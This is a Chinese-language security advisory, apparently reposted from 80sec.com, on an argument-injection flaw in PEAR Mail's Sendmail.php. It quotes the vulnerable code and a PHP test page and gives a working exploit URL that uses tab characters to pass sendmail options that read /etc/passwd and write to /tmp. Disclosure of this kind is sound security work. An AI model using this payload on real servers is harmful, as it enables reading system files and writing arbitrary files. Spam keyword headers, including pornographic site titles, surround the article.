成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

所有PEAR的Mail函數(shù)包含任意文件讀寫漏洞

安全 漏洞
$from 變量的過濾并不完全,由于escapeShellCmd會將\等字符替換為空,即可繞過對空格的檢查,而escapeshellcmd本身并不檢查對于參數(shù)的調(diào)用,所以導(dǎo)致安全漏洞的發(fā)生。

出現(xiàn)問題的地方位于Sendmail.php

......
if (!isset($from)) {
return PEAR::raiseError('No from address given.');
} elseif (strpos($from, ' ') !== false ||
strpos($from, ';') !== false ||
strpos($from, '&') !== false ||
strpos($from, '`') !== false) {
return PEAR::raiseError('From address specified with dangerous characters.');
}

$from = escapeShellCmd($from);
$mail = @popen($this->sendmail_path . (!empty($this->sendmail_args) ? ' ' . $this->sendmail_args : '') . " -f$from -- $recipients", 'w');
if (!$mail) {
return PEAR::raiseError('Failed to open sendmail [' . $this->sendmail_path . '] for execution.’);
}
……

可以看到$from 變量的過濾并不完全,由于escapeShellCmd會將\等字符替換為空,即可繞過對空格的檢查,而escapeshellcmd本身并不檢查對于參數(shù)的調(diào)用,所以導(dǎo)致安全漏洞的發(fā)生。

漏洞測試:


<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . “\r\n”;
$to =
“xxxxxxx@zzzz.com”;
$subj = “subscription request”;
$body = “subscribe me”;
$hdrs = array(
“To” => $to,
“Cc” => $cc,
“Bcc” => $bcc,
“From” => $from,
“Subject” => $subject,
);
$body=”test”;
$mail =& Mail::factory(’sendmail’);
$mail->send($to, $hdrs, $body);
?>

http://www.80sec.com/index.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

即可看到此漏洞的利用。

漏洞影響:所有PEAR的Mail函數(shù)包
漏洞狀態(tài):通知官方

責任編輯:王文文 來源: 80sec.com
相關(guān)推薦

2013-10-31 13:19:06

2011-12-26 10:17:12

2020-10-12 09:46:34

漏洞

2011-04-13 17:28:21

2019-01-02 09:16:27

2025-05-23 10:05:00

文件上傳漏洞JSP

2011-12-13 11:08:00

2009-12-09 09:49:40

2024-10-31 09:42:08

2009-07-06 17:47:44

2015-04-02 16:26:39

漏洞檢測工具Kadimus

2018-05-31 09:22:26

2021-01-15 09:36:23

漏洞shellweb安全

2009-12-08 17:01:01

PHP PEAR DB

2017-10-12 06:42:16

Tomcat代碼漏洞

2013-11-26 09:45:36

2021-10-06 13:54:12

漏洞PoC攻擊

2017-07-17 13:30:31

2023-09-18 23:28:44

2021-11-08 07:26:36

Vailyn漏洞安全工具
點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 亚洲国产成人精品女人久久久 | 久久久.com| av片免费观看 | 一级毛片在线播放 | 久久久久久成人 | 爱操av | 综合久久综合久久 | 在线看片国产精品 | 精国产品一区二区三区 | 国产成人一区二区三区 | 国产精品中文字幕在线 | 婷婷中文在线 | 国产91在线播放 | 福利视频一区二区 | 伊伊综合网 | 四色永久 | 91亚洲国产成人精品一区二三 | 国产激情网站 | 亚洲精品免费观看 | 日韩有码一区 | 亚洲一区 中文字幕 | 国产成人网 | 亚洲精品免费在线 | 国产精品久久久久久久久久久久久 | 亚洲视频在线看 | 天天操操操操操 | 午夜欧美 | 精品国产黄a∨片高清在线 成人区精品一区二区婷婷 日本一区二区视频 | 国产精品久久久久久久久久久免费看 | 亚洲欧美一区二区三区在线 | 午夜视频免费网站 | 欧美aaa级 | 国产高清精品在线 | 日韩在线一区二区三区 | 亚洲福利网| 97超碰人人 | 成人免费视频网站在线观看 | 日韩精品一区二区三区第95 | 欧美日韩视频在线第一区 | 91久久综合| 亚洲精品久久久久久久久久久 |